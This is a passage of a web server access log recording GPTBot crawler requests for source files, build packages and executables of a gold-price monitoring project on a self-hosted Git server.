Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest" +[17/Feb/2026:14:02:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/main.py" [Client 74.7.227.38] [Length 19736] [Gzip 5.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest" +[17/Feb/2026:14:02:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/main.py" [Client 74.7.227.38] [Length 19735] [Gzip 5.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest" +[17/Feb/2026:14:02:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor" [Client 74.7.227.38] [Length 10641] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build" +[17/Feb/2026:14:02:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot" [Client 74.7.227.38] [Length 10672] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build" +[17/Feb/2026:14:02:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/README.md" [Client 74.7.227.38] [Length 9938] [Gzip 2.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/README.md" +[17/Feb/2026:14:02:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/README.md" [Client 74.7.227.38] [Length 9938] [Gzip 2.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/README.md" +[17/Feb/2026:14:02:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/calculator.py" [Client 74.7.227.38] [Length 12868] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot" +[17/Feb/2026:14:02:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/notifier.py" [Client 74.7.227.38] [Length 18990] [Gzip 10.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/notifier.py" +[17/Feb/2026:14:02:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/storage.py" [Client 74.7.227.38] [Length 11008] [Gzip 3.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/storage.py" +[17/Feb/2026:14:02:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/assetpilot.ico" [Client 74.7.227.38] [Length 283446] [Gzip 11.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/assetpilot.ico" +[17/Feb/2026:14:02:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/assetpilot.ico" [Client 74.7.227.38] [Length 9886] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/assetpilot.ico" +[17/Feb/2026:14:02:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/assetpilot.ico" [Client 74.7.227.38] [Length 84370] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/assetpilot.ico" +[17/Feb/2026:14:02:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/main.py" [Client 74.7.227.38] [Length 9231] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/main.py" +[17/Feb/2026:14:02:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor" [Client 74.7.227.38] [Length 9906] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor" +[17/Feb/2026:14:02:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot" [Client 74.7.227.38] [Length 9893] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot" +[17/Feb/2026:14:02:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/main.py" [Client 74.7.227.38] [Length 9231] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/main.py" +[17/Feb/2026:14:02:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/main.py" [Client 74.7.227.38] [Length 9231] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/main.py" +[17/Feb/2026:14:02:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/calculator.py" [Client 74.7.227.38] [Length 12384] [Gzip 5.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/calculator.py" +[17/Feb/2026:14:02:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/calculator.py" [Client 74.7.227.38] [Length 9891] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/calculator.py" +[17/Feb/2026:14:02:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/main.py" [Client 74.7.227.38] [Length 22469] [Gzip 10.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/main.py" +[17/Feb/2026:14:02:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/main.py" [Client 74.7.227.38] [Length 22469] [Gzip 10.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/main.py" +[17/Feb/2026:14:02:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/main.py" [Client 74.7.227.38] [Length 22471] [Gzip 10.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/main.py" +[17/Feb/2026:14:02:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/calculator.py" [Client 74.7.227.38] [Length 1940] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/calculator.py" +[17/Feb/2026:14:02:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher" [Client 74.7.227.38] [Length 10846] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot" +[17/Feb/2026:14:02:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/README.md" [Client 74.7.227.38] [Length 9938] [Gzip 2.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/README.md" +[17/Feb/2026:14:02:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/GoldMonitor.exe" [Client 74.7.227.38] [Length 10852] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist" +[17/Feb/2026:14:02:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/main.py" [Client 74.7.227.38] [Length 9905] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PythonTest/main.py" +[17/Feb/2026:14:02:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/main.py" [Client 74.7.227.38] [Length 9905] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/PythonTest/main.py" +[17/Feb/2026:14:02:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/main.py" [Client 74.7.227.38] [Length 9904] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PythonTest/main.py" +[17/Feb/2026:14:02:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs" [Client 74.7.227.38] [Length 10361] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot" +[17/Feb/2026:14:02:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs" [Client 74.7.227.38] [Length 10361] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor" +[17/Feb/2026:14:02:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/AssetPilot.pkg" [Client 74.7.227.38] [Length 10884] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot" +[17/Feb/2026:14:02:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" [Client 74.7.227.38] [Length 10888] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor" +[17/Feb/2026:14:02:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/AssetPilot.exe" [Client 74.7.227.38] [Length 10852] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist" +[17/Feb/2026:14:02:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher" [Client 74.7.227.38] [Length 9889] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher" +[17/Feb/2026:14:02:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/.vscode" [Client 74.7.227.38] [Length 10086] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot" +[17/Feb/2026:14:02:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/GoldMonitor.exe" [Client 74.7.227.38] [Length 9491] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/GoldMonitor.exe" +[17/Feb/2026:14:02:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/GoldMonitor.exe" [Client 74.7.227.38] [Length 9892] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/GoldMonitor.exe" +[17/Feb/2026:14:02:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/GoldMonitor.exe" [Client 74.7.227.38] [Length 44916235] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/GoldMonitor.exe" +[17/Feb/2026:14:02:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/krx_gold_fetcher.py" [Client 74.7.227.38] [Length 12225] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher" +[17/Feb/2026:14:02:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs" [Client 74.7.227.38] [Length 9916] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs" +[17/Feb/2026:14:02:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs" [Client 74.7.227.38] [Length 9922] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs" +[17/Feb/2026:14:02:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/AssetPilot.pkg" [Client 74.7.227.38] [Length 9909] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/AssetPilot.pkg" +[17/Feb/2026:14:02:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/GoldMonitor.pkg?display=rendered" [Client 74.7.227.38] [Length 10904] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" +[17/Feb/2026:14:02:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/AssetPilot.exe" [Client 74.7.227.38] [Length 9484] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/AssetPilot.exe" +[17/Feb/2026:14:02:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/AssetPilot.exe" [Client 74.7.227.38] [Length 9889] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/AssetPilot.exe" +[17/Feb/2026:14:02:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/.vscode" [Client 74.7.227.38] [Length 9880] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/.vscode" +[17/Feb/2026:14:02:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" [Client 74.7.227.38] [Length 44573707] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" +[17/Feb/2026:14:02:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/AssetPilot.pkg" [Client 74.7.227.38] [Length 9516] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/AssetPilot.pkg" +[17/Feb/2026:14:02:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/AssetPilot.pkg" [Client 74.7.227.38] [Length 44615970] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/AssetPilot.pkg" +[17/Feb/2026:14:02:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" [Client 74.7.227.38] [Length 9522] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/GoldMonitor.pkg" +[17/Feb/2026:14:02:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/dist/AssetPilot.exe" [Client 74.7.227.38] [Length 44981538] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 